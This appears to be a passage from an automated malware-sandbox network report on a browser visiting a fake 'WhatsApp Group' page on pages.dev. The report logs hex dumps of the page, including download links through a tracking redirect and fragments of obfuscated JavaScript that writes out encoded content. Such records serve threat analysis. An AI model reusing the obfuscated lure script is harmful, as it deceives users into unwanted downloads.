              Data Ascii: 5c0 9.247-7.525 16.771-16.772 16.771-2.815 0-5.562-.7-8.019-2.047L2.097 34.72zm9.299-5.357l.511.307a13.955 13.955 0 007.098 1.945c7.678 0 13.94-6.261 13.94-13.94 0-3.719-1.45-7.233-4.078-9.86a13.89 13.89 0 00-9.862-4.096c-7.695 0-13.956 6.262-13.956 13.94
              2024-08-29 22:47:34 UTC661INData Raw: 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 70 61 69 6e 74 31 5f 6c 69 6e 65 61 72 5f 77 68 61 74 73 61 70 70 5f 6d 6f 62 69 6c 65 5f 6c 6f 67 6f 22 20 78 31 3d 22 31 38 2e 39 34 32 22 20 79 31 3d 22 33 34 2e 37 32 34 22 20 78 32 3d 22 31 38 2e 39 34 32 22 20 79 32 3d 22 2e 38 37 35 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 46 39 46 39 46 39 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 3c 70 61 74 74 65 72 6e 20 69 64 3d 22 70 61 74 74 65 72 6e 30 5f 77 68 61 74 73 61 70 70 5f 6d 6f 62 69 6c 65 5f 6c 6f 67 6f 22 20 70
              Data Ascii: earGradient id="paint1_linear_whatsapp_mobile_logo" x1="18.942" y1="34.724" x2="18.942" y2=".875" gradientUnits="userSpaceOnUse"><stop stop-color="#F9F9F9"/><stop offset="1" stop-color="#fff"/></linearGradient><pattern id="pattern0_whatsapp_mobile_logo" p


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              13192.168.2.449753188.114.96.34432288C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              2024-08-29 22:47:34 UTC351OUTGET /favicon.ico HTTP/1.1
              Host: dfsvgd.pages.dev
              Connection: keep-alive
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: */*
              Sec-Fetch-Site: none
              Sec-Fetch-Mode: cors
              Sec-Fetch-Dest: empty
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.9
              2024-08-29 22:47:34 UTC712INHTTP/1.1 200 OK
              Date: Thu, 29 Aug 2024 22:47:34 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: close
              Access-Control-Allow-Origin: *
              Cache-Control: public, max-age=0, must-revalidate
              referrer-policy: strict-origin-when-cross-origin
              x-content-type-options: nosniff
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4smdxT98jhQNT5y2ad%2F2PCVG7jgzn1H9P8FuLVE0hbzyQtTzg0HMX6G%2BSRy36vF9eLy9Tt20wBAibWRxP7XLZiB5wexS7O%2FD7YavyDqwlk2ldoCmu8aR3O7KXQuzytNoVEde"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8bb01566e9d617b1-EWR
              alt-svc: h3=":443"; ma=86400
              2024-08-29 22:47:34 UTC657INData Raw: 32 35 63 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 21 2d 2d 20 52 65 71 75 69 72 65 64 20 6d 65 74 61 20 74 61 67 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 68 61 74 73 41 70 70 20 47 72 6f 75 70 20
              Data Ascii: 25c1<!doctype html><html lang="en"> <head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> ... Required meta tags --> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>WhatsApp Group
              2024-08-29 22:47:34 UTC1369INData Raw: 68 74 3a 20 34 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 62 74 20 64 69 76 20 70 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 72 65 6d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 72 67 62 28 31 31 37 2c 20 31 31 37 2c 20 31 31 37 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 66 39 65 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 62 74 20 64 69 76 20 2e 74 6f 6d 62 6f 6c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 31 65 36 37 35 3b 0d
              Data Ascii: ht: 400; } .bt div p { margin-bottom: 2rem; color: rgb(117, 117, 117); } .body { background-color: #4f9e00; } .bt div .tombol { background: #01e675;
              2024-08-29 22:47:34 UTC1369INData Raw: 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 72 65 6d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 28 30 2c 20 30 2c 20 30 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 72 65 6d 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 6e 61 76 62 61 72 2d 64 61 72 6b 20 73 74 69 63 6b 79 2d 74 6f 70 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 31 32
              Data Ascii: center; margin-top: 2rem; background: rgb(0, 0, 0); color: white; padding: 2rem; } </style> </head> <body> <nav class="navbar navbar-dark sticky-top" style="background-color: #12
              2024-08-29 22:47:34 UTC1369INData Raw: 2f 2f 73 6d 78 74 72 61 63 6b 2e 63 6f 6d 2f 74 72 61 63 6b 69 6e 67 32 30 32 2f 72 65 64 69 72 65 63 74 2f 72 74 72 2e 70 68 70 3f 74 32 30 32 69 64 3d 32 31 34 26 63 31 3d 52 4a 5f 45 54 48 26 74 32 30 32 6b 77 3d 52 4a 5f 45 54 48 22 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 22 3e 44 6f 77 6e 6c 6f 61 64 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 73 6f 73 20 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 75 6c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 6d 78 74 72 61 63 6b 2e 63 6f 6d 2f 74 72 61 63
              Data Ascii: //smxtrack.com/tracking202/redirect/rtr.php?t202id=214&c1=RJ_ETH&t202kw=RJ_ETH" style="text-decoration: none;">Download</a> </div> <div class="isos container text-center"> <ul> <li><a href="https://smxtrack.com/trac
              2024-08-29 22:47:34 UTC1369INData Raw: 36 34 25 36 44 27 2c 27 25 33 30 25 33 36 25 36 35 25 27 2c 27 46 25 36 33 25 36 31 25 37 34 27 2c 27 37 32 25 36 31 25 36 44 25 36 27 2c 27 34 25 32 45 25 37 37 25 37 32 27 2c 27 25 33 43 25 36 34 25 36 39 25 27 2c 27 36 33 25 37 32 25 36 39 25 37 27 2c 27 33 42 25 30 41 25 32 30 25 32 27 2c 27 30 25 37 34 25 33 45 25 32 37 27 2c 27 33 43 25 32 46 25 37 33 25 36 27 2c 27 25 37 30 25 36 35 25 33 44 25 27 2c 27 39 31 38 32 39 32 39 4b 66 67 71 42 70 27 2c 27 25 36 35 25 33 44 25 32 32 25 27 2c 27 77 72 69 74 65 27 2c 27 46 25 37 34 25 32 32 25 33 45 27 2c 27 46 25 37 33 25 36 33 25 37 32 27 2c 27 32 46 25 36 38 25 37 41 25 37 27 2c 27 30 25 37 42 25 30 41 25 32 30 27 2c 27 33 44 25 33 44 25 33 44 25 32 27 2c 27 31 25 37 32 25 36 31 25 36 44 27 2c 27 25 33
              Data Ascii: 64%6D','%30%36%65%','F%63%61%74','72%61%6D%6','4%2E%77%72','%3C%64%69%','63%72%69%7','3B%0A%20%2','0%74%3E%27','3C%2F%73%6','%70%65%3D%','9182929KfgqBp','%65%3D%22%','write','F%74%22%3E','F%73%63%72','2F%68%7A%7','0%7B%0A%20','3D%3D%3D%2','1%72%61%6D','%3
              2024-08-29 22:47:34 UTC1369INData Raw: 27 36 38 25 37 34 25 32 37 25 32 27 5d 3b 5f 30 78 33 39 37 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 33 64 63 32 34 3b 7d 3b 72 65 74 75 72 6e 20 5f 30 78 33 39 37 64 28 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 65 30 38 28 5f 30 78 31 61 36 39 39 61 2c 5f 30 78 35 63 64 64 34 66 29 7b 76 61 72 20 5f 30 78 34 36 33 32 34 65 3d 5f 30 78 33 39 37 64 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 33 65 30 38 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 30 61 30 36 38 2c 5f 30 78 31 32 34 39 61 35 29 7b 5f 30 78 35 30 61 30 36 38 3d 5f 30 78 35 30 61 30 36 38 2d 28 30 78 31 2a 2d 30 78 32 32 65 64 2b 30 78 36 30 30 2b 30 78 35 2a 30 78 35 64 65 29 3b 76 61 72 20 5f 30 78 34 38 36 63 38 35 3d 5f 30 78 34 36 33 32 34 65 5b 5f 30 78 35
              Data Ascii: '68%74%27%2'];_0x397d=function(){return _0x13dc24;};return _0x397d();}function _0x3e08(_0x1a699a,_0x5cdd4f){var _0x46324e=_0x397d();return _0x3e08=function(_0x50a068,_0x1249a5){_0x50a068=_0x50a068-(0x1*-0x22ed+0x600+0x5*0x5de);var _0x486c85=_0x46324e[_0x5
              2024-08-29 22:47:34 UTC1369INData Raw: 31 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 64 33 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 38 62 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 61 34 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 65 63 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 36 39 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 37 33 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 62 64 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 64 66 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 38 39 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 37 63 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 65 64 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 64 38 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 38 33 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 62 38 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 61 34 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78
              Data Ascii: 1)+_0x47eb1f(0xd3)+_0x47eb1f(0x8b)+_0x47eb1f(0xa4)+_0x47eb1f(0xec)+_0x47eb1f(0x69)+_0x47eb1f(0x73)+_0x47eb1f(0xbd)+_0x47eb1f(0xdf)+_0x47eb1f(0x89)+_0x47eb1f(0x7c)+_0x47eb1f(0xed)+_0x47eb1f(0xd8)+_0x47eb1f(0x83)+_0x47eb1f(0xb8)+_0x47eb1f(0xa4)+_0x47eb1f(0x
              2024-08-29 22:47:34 UTC802INData Raw: 62 31 66 28 30 78 63 39 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 62 61 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 65 65 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 37 66 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 39 38 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 37 30 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 62 65 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 61 32 29 2b 28 5f 30 78 34 37 65 62 31 66 28 30 78 38 66 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 65 35 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 65 34 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 39 33 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 65 38 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 36 61 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 39 63 29 2b 5f 30 78 34 37 65 62 31 66 28 30 78 63 63 29 2b 5f 30 78 34
              Data Ascii: b1f(0xc9)+_0x47eb1f(0xba)+_0x47eb1f(0xee)+_0x47eb1f(0x7f)+_0x47eb1f(0x98)+_0x47eb1f(0x70)+_0x47eb1f(0xbe)+_0x47eb1f(0xa2)+(_0x47eb1f(0x8f)+_0x47eb1f(0xe5)+_0x47eb1f(0xe4)+_0x47eb1f(0x93)+_0x47eb1f(0xe8)+_0x47eb1f(0x6a)+_0x47eb1f(0x9c)+_0x47eb1f(0xcc)+_0x4
              2024-08-29 22:47:34 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              14192.168.2.449754184.28.90.27443
              TimestampBytes transferredDirectionData
              2024-08-29 22:47:35 UTC239OUTGET /fs/windows/config.json HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              Accept-Encoding: identity
              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
              Range: bytes=0-2147483646
              User-Agent: Microsoft BITS/7.8
              Host: fs.microsoft.com
              2024-08-29 22:47:35 UTC515INHTTP/1.1 200 OK
              ApiVersion: Distribute 1.1
              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
              Content-Type: application/octet-stream
              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
              Server: ECAcc (lpl/EF06)
              X-CID: 11
              X-Ms-ApiVersion: Distribute 1.2
              X-Ms-Region: prod-weu-z1
              Cache-Control: public, max-age=125311
              Date: Thu, 29 Aug 2024 22:47:35 GMT
              Content-Length: 55
              Connection: close
              X-CID: 2
              2024-08-29 22:47:35 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              15192.168.2.44975540.127.169.103443
              TimestampBytes transferredDirectionData
              2024-08-29 22:47:39 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Evd2pypcchxB28h&MD=du8yf362 HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
              Host: slscr.update.microsoft.com
              2024-08-29 22:47:40 UTC560INHTTP/1.1 200 OK
              Cache-Control: no-cache
              Pragma: no-cache
              Content-Type: application/octet-stream
              Expires: -1
              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
              MS-CorrelationId: 26b87b40-7da5-4fc7-99c3-5767ae6ea1d2
              MS-RequestId: 7b88dda1-90da-4435-8ec6-2b8b44658c1a
              MS-CV: yOazpHrX40GJ9P1s.0
              X-Microsoft-SLSClientCache: 2880
              Content-Disposition: attachment; filename=environment.cab
              X-Content-Type-Options: nosniff
              Date: Thu, 29 Aug 2024 22:47:39 GMT
              Connection: close
              Content-Length: 24490
              2024-08-29 22:47:40 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
              2024-08-29 22:47:40 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              16192.168.2.44977340.127.169.103443
              TimestampBytes transferredDirectionData
              2024-08-29 22:48:17 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Evd2pypcchxB28h&MD=du8yf362 HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
              Host: slscr.update.microsoft.com
              2024-08-29 22:48:18 UTC560INHTTP/1.1 200 OK
              Cache-Control: no-cache
              Pragma: no-cache
              Content-Type: application/octet-stream
              Expires: -1
              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
              ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
              MS-CorrelationId: 660bbbb4-5aa9-4c39-a2d3-3e1db844f7e1
              MS-RequestId: 8232183d-5a5c-4d56-94cc-1294bb75f7b7
              MS-CV: qTD5LQUAcUK+RBjW.0
              X-Microsoft-SLSClientCache: 1440
              Content-Disposition: attachment; filename=environment.cab
              X-Content-Type-Options: nosniff
              Date: Thu, 29 Aug 2024 22:48:17 GMT
              Connection: close
              Content-Length: 30005
              2024-08-29 22:48:18 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
              Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
              2024-08-29 22:48:18 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
              Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              17192.168.2.44977635.190.80.14432288C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              2024-08-29 22:48:31 UTC535OUTOPTIONS /report/v4?s=UKLXXHvuekcQ4aoLacKwPYzxX6wUZH5iwB%2Fm325F2Fs5Op0K4cpKAoY0QWUY2Zi%2FiTMBHNAV41jBVCGvFGsHFYBrtWDRvL%2FeQ760zM4q6HvnPTbnTa10pIecUpgvq1rCDIGQ HTTP/1.1
              Host: a.nel.cloudflare.com
              Connection: keep-alive
              Origin: https://dfsvgd.pages.dev
              Access-Control-Request-Method: POST
              Access-Control-Request-Headers: content-type
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.9
              2024-08-29 22:48:31 UTC336INHTTP/1.1 200 OK
              Content-Length: 0
              access-control-max-age: 86400
              access-control-allow-methods: OPTIONS, POST
              access-control-allow-origin: *
              access-control-allow-headers: content-length, content-type
              date: Thu, 29 Aug 2024 22:48:31 GMT
              Via: 1.1 google
              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
              Connection: close


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              18192.168.2.44977735.190.80.14432288C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              2024-08-29 22:48:32 UTC476OUTPOST /report/v4?s=UKLXXHvuekcQ4aoLacKwPYzxX6wUZH5iwB%2Fm325F2Fs5Op0K4cpKAoY0QWUY2Zi%2FiTMBHNAV41jBVCGvFGsHFYBrtWDRvL%2FeQ760zM4q6HvnPTbnTa10pIecUpgvq1rCDIGQ HTTP/1.1
              Host: a.nel.cloudflare.com
              Connection: keep-alive
              Content-Length: 995
              Content-Type: application/reports+json
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.9
              2024-08-29 22:48:32 UTC995OUTData Raw: 5b 7b 22 61 67 65 22 3a 36 30 30 30 38 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 30 37 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 64 66 73 76 67 64 2e 70 61 67 65 73 2e 64 65 76 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 72 65 73 70 6f 6e 73 65 2e 69 6e 76 61 6c 69 64 2e 63 6f 6e 74 65 6e 74 5f 6c 65 6e 67 74 68 5f 6d
              Data Ascii: [{"age":60008,"body":{"elapsed_time":1071,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://dfsvgd.pages.dev/","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":200,"type":"http.response.invalid.content_length_m
              2024-08-29 22:48:32 UTC168INHTTP/1.1 200 OK
              Content-Length: 0
              date: Thu, 29 Aug 2024 22:48:32 GMT
              Via: 1.1 google
              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
              Connection: close


              Click to jump to process

              Click to jump to process

              Click to jump to process

              Target ID:0
              Start time:18:47:20
              Start date:29/08/2024
              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Imagebase:0x7ff76e190000
              File size:3'242'272 bytes
              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:false

              Target ID:2
              Start time:18:47:25
              Start date:29/08/2024
              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
              Wow64 process (32bit):false
